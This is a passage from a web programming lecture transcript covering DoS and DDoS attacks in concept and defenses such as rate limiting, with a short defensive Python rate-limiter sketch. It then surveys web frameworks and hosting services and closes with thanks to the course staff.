And what potential vulnerabilities or exploits come about there? What could a potentially malicious hacker try to do, knowing the constraints of what our systems are capable of? AUDIENCE: Like [INAUDIBLE] can start DDoSing your system, sending a bunch of requests at the same time. BRIAN YU: Exactly. Sending a bunch of requests. So if our server, for instance, can only handle 1,000 requests per second, and one hacker, on their computer, decides that they want to try and shut down our system, maybe they're going to send 1,001 requests in a single second to our server. And this is what we'll generally call a DoS, or denial-of-service attack, where a user tries to send request after request after request in an attempt to overload our servers, in order to try and make sure that we're unable to handle all the requests that are coming in. And if we're handling all of the requests coming in from one user, then we're potentially not able to handle requests coming from other people as well. Of course, this probably isn't too much of an issue if we've got dozens and dozens of servers and only one computer is making a lot of requests. Which is why the next thing you mentioned was also a potential exploit or concern: what if it's not just one single computer, but a whole botnet of computers that are all trying to make requests to the same web server at the same time? This is what we generally call a DDoS attack, a distributed denial-of-service attack, where we have a lot of different computers that are all trying to make requests at the same time to our same web application. And as a result, it's quite likely that the web application might be overloaded by all these requests and be unable to handle them. And so what are ways of potentially dealing with a DDoS attack?
Of a bunch of people trying to make requests at the same time, trying to shut down our server by overloading it with too many requests? Yeah. AUDIENCE: Limit how many requests they can make. BRIAN YU: Try and limit how many requests they can make. So certainly one potential approach to dealing with DDoS attacks is to try and add some sort of filtering system: before a request actually gets to the server, try and filter and see, is this a valid request or not? And maybe there are heuristics you can use for that. And certainly, you can limit people: if you notice that a particular computer is making a lot of requests at the same time or in a short amount of time, then maybe you can put downward pressure on that by blacklisting that particular user. So that's certainly something we could think about as well. But at the end of the day, it really often does come down to just a battle of resources, of who has more resources. Is it the adversary or is it yourself? And so oftentimes this is not something that you can just deal with at the web application level, but it's something that needs to be dealt with at the server level or the ISP level, where you really need to make sure that your infrastructure is in place, especially if you're dealing with a large web application, to make sure that you're able to handle all of that potential traffic. And so certainly, the end idea of this, and of all the topics we've talked about so far today, is that through all of the things we've talked about, whether it was just a simple, static HTML web page, or dealing with scalability, or Flask and Django and other web services, or JavaScript and how someone might be able to inject JavaScript code into our web application, there are security vulnerabilities everywhere. And it's definitely a good idea to be thinking about what those vulnerabilities might be and how we might be able to deal with them when they arise.
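The request-limiting idea discussed above can be sketched as a per-client sliding window. Real deployments do this at the load balancer or the ISP/edge level, as the lecture notes, but the bookkeeping looks roughly like this (the limit and window values are arbitrary for illustration):

```python
import time
from collections import deque

class RateLimiter:
    """Sketch: allow at most `limit` requests from a client in any
    `window`-second span; reject the rest."""

    def __init__(self, limit: int, window: float):
        self.limit = limit
        self.window = window
        self.hits = {}  # client id -> deque of request timestamps

    def allow(self, client: str, now: float = None) -> bool:
        now = time.monotonic() if now is None else now
        q = self.hits.setdefault(client, deque())
        # Drop timestamps that have fallen out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False  # over the limit: reject (or blacklist) this client
        q.append(now)
        return True

limiter = RateLimiter(limit=3, window=1.0)
print([limiter.allow("attacker", now=t) for t in (0.0, 0.1, 0.2, 0.3)])
```

A filter like this helps against a single noisy client, but, as discussed, a distributed attack spreads the requests across many clients, which is why DDoS defense ultimately becomes a question of infrastructure and resources.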
And so now let's think about moving beyond this course as we arrive at its conclusion. What comes next? If web programming is something that you're interested in continuing to learn more about, we were really just barely scratching the surface here when it came to programming with Python and JavaScript. We looked at Flask and Django in particular as the web frameworks that we were using in order to build and design and deploy our websites. But those certainly are not the only options. There are other web frameworks that are gaining popularity nowadays that are definitely worth looking into if this is the sort of thing that interests you. Generally, we can divide them into server-side frameworks, the sort of frameworks that, like Flask or Django, are going to be running on our web server somewhere, where Express.js and Ruby on Rails are examples of some server-side frameworks that are commonly used. Actually, sorry. This is mislocated a little bit. And client-side frameworks include things like React or Angular, common frameworks that are used on the client side now in order to generate components that are displayed and are able to interact with the web server in some way. And so these are definitely things to look at as well. And then when it comes to actually taking your web application and deploying it to the internet, if that's something that's of interest to you as well, there are a whole number of other services that you can use for that. So GitHub Pages was one that we looked at way at the very beginning of the course, which is generally used if we just want to deploy some static content to a page, like HTML and CSS and JavaScript. And that's totally fine for GitHub Pages. But if we want to run a web server, we're going to need a little bit more than that. And so we did look a little bit at Heroku when we were thinking about using our database.
So Heroku is a service that allows us to host web applications on the internet. It makes it relatively easy to take a Flask or Django web application and host it. And in particular, it makes it very easy to hook that up to a database, connecting it with a PostgreSQL database as we did in one of the early projects, in order to allow us to deploy that as well. But if you're looking for even more power and even more feature-filled web hosting than that, you can take a look at Amazon Web Services or Google Cloud or Microsoft Azure, all of which offer a lot of different services for taking web applications and deploying them to the internet. They often will use Docker, which we looked at a little while back when we were talking about containerizing our application and bundling together our web application with the database and any other services that might be involved in running that application. And so certainly these are services that you can use as well if you're thinking about actually building out one of these web applications and deploying it to the internet. And these larger services like AWS or Microsoft Azure have the ability to take care of some of the scalability concerns that we were talking about: the ability to add load balancers that make sure we have enough servers to handle all the requests coming in from all the different users. And they do auto scaling, such that as more users come in, we can increase or decrease the number of servers as well. And so these are increasingly popular tools and technologies that allow people to take web applications that they're building on their own computers and ultimately deploy them to the internet. Before we wrap up, I just want to make sure to say thank you to all the people that were really instrumental in making the course possible. To David, my co-instructor, who unfortunately couldn't be here today.
But also to our great teaching fellows, Anushree and Elle and Rodrigo and Sebastian and Jessica, for running the course's office hours and sections. And of course, the CS50 production team, Ramon and Andrew and Max and Meredith and Ian and Scully and Dan and Arturo, for making the lectures and lecture videos possible. Thank you to you all. And of course, finally, thank you to all of you for joining us in this course, for learning about web programming with Python and JavaScript. Hope you enjoyed it. Hope you got an opportunity to work on some hands-on projects that were exciting and ultimately showed you the power and capacity that Python and JavaScript have for building really dynamic and really interesting web applications. Can't wait to see what you all continue to do with your final projects. But that's it for web programming with Python and JavaScript, so thank you all so much. [APPLAUSE]